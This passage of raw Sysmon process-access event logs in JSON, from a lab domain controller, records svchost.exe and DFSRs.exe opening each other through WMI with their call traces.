07:53:25.439","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1084","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2597b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+283dc|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1829,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.439\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1084\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2a2f2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29e26|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+28432|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.439","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1084","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2a2f2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29e26|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+28432|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1830,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.439\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1084\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25d35|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2619d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.439","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1084","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25d35|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2619d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1831,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.439\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1084\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+261b7|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.439","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1084","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+261b7|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1832,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.455\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nSourceProcessId: 2904\r\nSourceThreadId: 3276\r\nSourceImage: C:\\Windows\\system32\\DFSRs.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmidcprv.dll+163a4|C:\\Windows\\system32\\wbem\\wmidcprv.dll+166e0|C:\\Windows\\system32\\wbem\\wmidcprv.dll+abad|C:\\Windows\\system32\\wbem\\wmidcprv.dll+b57e|C:\\Windows\\system32\\DFSRs.exe+d839d|C:\\Windows\\system32\\DFSRs.exe+c2ea|C:\\Windows\\system32\\DFSRs.exe+50e1|C:\\Windows\\system32\\DFSRs.exe+72d2|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.455","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","SourceProcessId":"2904","SourceThreadId":"3276","SourceImage":"C:\\Windows\\system32\\DFSRs.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmidcprv.dll+163a4|C:\\Windows\\system32\\wbem\\wmidcprv.dll+166e0|C:\\Windows\\system32\\wbem\\wmidcprv.dll+abad|C:\\Windows\\system32\\wbem\\wmidcprv.dll+b57e|C:\\Windows\\system32\\DFSRs.exe+d839d|C:\\Windows\\system32\\DFSRs.exe+c2ea|C:\\Windows\\system32\\DFSRs.exe+50e1|C:\\Windows\\system32\\DFSRs.exe+72d2|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1833,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.455\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1084\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+264a1|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2669f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25c4b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27476|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27db2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+277c9|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26100|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.455","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1084","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+264a1|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2669f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25c4b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27476|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27db2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+277c9|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26100|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1834,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.455\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1084\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+5a1b8|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+35a49|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2807f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29591|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292c2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.455","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1084","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+5a1b8|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+35a49|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2807f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29591|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292c2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1835,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.455\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1084\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2597b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+283dc|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.455","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1084","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2597b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+283dc|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCR